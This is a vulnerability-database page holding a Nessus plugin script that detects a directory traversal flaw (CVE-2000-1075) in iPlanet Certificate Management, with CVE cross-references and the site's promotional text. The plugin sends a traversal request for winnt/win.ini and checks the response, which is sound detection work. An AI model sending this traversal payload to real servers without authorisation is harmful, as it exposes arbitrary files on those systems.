Lucene search
K

iPlanet Certificate Management Traversal Arbitrary File Access

🗓️ 29 May 2001 00:00:00Reported by TenableType 
nessus
 nessus
🔗 www.tenable.com👁 19 Views

Remote web server allows arbitrary file access via traversal vulnerability.

Related
Refs
Code
ReporterTitlePublishedViews
Family
CVE
CVE-2000-1075
7 May 200104:00
cve
Cvelist
CVE-2000-1075
7 May 200104:00
cvelist
EUVD
EUVD-2000-1061
7 Oct 202500:30
euvd
Tenable Nessus
iPlanet Directory Server Traversal Arbitrary File Access
8 Jan 200100:00
nessus
NVD
CVE-2000-1075
11 Dec 200005:00
nvd
Packet Storm
accipiter.txt
9 Jan 200400:00
packetstorm
securityvulns
[Full-Disclosure] Directory Traversal in Accipiter Direct Server 6.0
11 Jan 200400:00
securityvulns
#
# (C) Tenable Network Security, Inc.
#

#
# XXX might be redundant with plugin #10589
#


include("compat.inc");

if(description)
{
 script_id(10683);
 script_version ("1.25");

 script_cve_id("CVE-2000-1075");
 script_bugtraq_id(1839);

 script_name(english:"iPlanet Certificate Management Traversal Arbitrary File Access");
 script_summary(english:"\..\..\file.txt");
 
 script_set_attribute(attribute:"synopsis", value:
"The remote web server is affected by an information disclosure 
vulnerability." );
 script_set_attribute(attribute:"description", value:
"It is possible to read arbitrary files on
the remote server by prepending /ca/\../\../
in front on the file name." );
 # http://web.archive.org/web/20031016105939/http://www2.corest.com/common/showdoc.php?idx=123&idxseccion=10
 script_set_attribute(attribute:"see_also", value:"http://www.nessus.org/u?8ffab934" );
 script_set_attribute(attribute:"solution", value:
"The vendor has released a patch to fix the issue." );
  script_set_cvss_base_vector("CVSS2#AV:N/AC:L/Au:N/C:P/I:N/A:N");
  script_set_cvss_temporal_vector("CVSS2#E:POC/RL:OF/RC:C");
  script_set_attribute(attribute:"exploitability_ease", value:"Exploits are available");
  script_set_attribute(attribute:"exploit_available", value:"true");

 script_set_attribute(attribute:"plugin_publication_date", value: "2001/05/29");
 script_set_attribute(attribute:"vuln_publication_date", value: "2000/10/26");
 script_cvs_date("Date: 2018/07/12 19:01:16");
 script_set_attribute(attribute:"plugin_type", value:"remote");
 script_end_attributes();
 
 script_category(ACT_ATTACK);
 
 script_copyright(english:"This script is Copyright (C) 2001-2018 Tenable Network Security, Inc.");
 script_family(english:"Web Servers");

 script_dependencie("http_version.nasl");
 script_require_ports("Services/www", 443);
 exit(0);
}

#
# The script code starts here
#

include("global_settings.inc");
include("misc_func.inc");
include("http.inc");

port = get_http_port(default:443);
banner = get_http_banner(port:port);
if ( "iPlanet" >!< banner ) exit(0);

res = http_send_recv3(method:"GET", item:string("/ca\\../\\../\\../\\../winnt/win.ini"), port:port);
if (isnull(res)) exit(1, "The web server on port "+port+" failed to respond.");
# ssl negot. is done by nessusd, transparently.

if (("[windows]" >< res[2]) ||
    ("[fonts]" >< res[2])){
  security_warning(port:port);
}

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

12 Jul 2018 19:01Current
5.7Medium risk
Vulners AI Score5.7
CVSS 25
EPSS0.04012
19